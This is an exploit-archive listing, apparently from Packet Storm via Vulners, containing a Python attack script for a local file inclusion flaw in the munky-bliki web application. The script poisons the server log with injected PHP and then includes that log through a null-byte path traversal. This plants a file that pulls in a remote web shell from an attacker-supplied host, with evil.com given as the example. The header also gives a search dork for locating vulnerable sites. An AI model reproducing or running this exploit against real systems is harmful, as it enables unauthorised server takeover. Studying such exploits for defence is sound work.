Lucene search
K

munkybliki-lfi.txt

🗓️ 16 Aug 2008 00:00:00Reported by IRCRASHType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 15 Views

munky-bliki Lfi exploit, allows shell creation on a site

Code
`#!user/bin/python  
# -*- coding: cp1256 -*-  
#####################################################################################  
#### munky-bliki Lfi ####  
#####################################################################################  
# #  
#AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr)) #  
#Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr)) #  
#Our Site : Http://IRCRASH.COM #  
#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) #  
#####################################################################################  
# #  
#Script Download : http://kent.dl.sourceforge.net/sourceforge/munky/munky-bliki-0.01a.tar.gz  
# #  
#DORK : "Copyright © 2004 Dovid Kopel" #  
# #  
#####################################################################################  
# [Bug] #  
# #  
#http://Site/?zone=file.type%00 #  
# [Note] #  
# #  
#By this exploit u can create a shell on valun site ;) #  
# #  
#####################################################################################  
# Site : Http://IRCRASH.COM #  
###################################### TNX GOD ######################################  
import httplib,urllib  
site=raw_input('Site [Ex www.r3d.com]: ')  
path=raw_input('Path [Ex /munky]: ')  
shell=raw_input('Shell [Ex http://evil.com/shell.txt]: ')  
print "[*]Powered by : R3d.W0rm - [email protected]"  
conn=httplib.HTTPConnection(site)  
print "[*]Connected to " + site  
print "[*]Sending shell code ..."  
conn.request('GET',path + "/?zone=<?php%20$fp=fopen('r3d.w0rm.php','w%2B');fwrite($fp,'<?php%20include%20\\'" + shell + "\\';?>');fclose($fp);?>")  
print "[*]Running shell code ..."  
data=urllib.urlopen('http://' + site + path + '/?zone=../logs/counts.log%00')  
print "[*]Shell created"  
print "[*]" + site + path + '/r3d.w0rm.php'  
  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation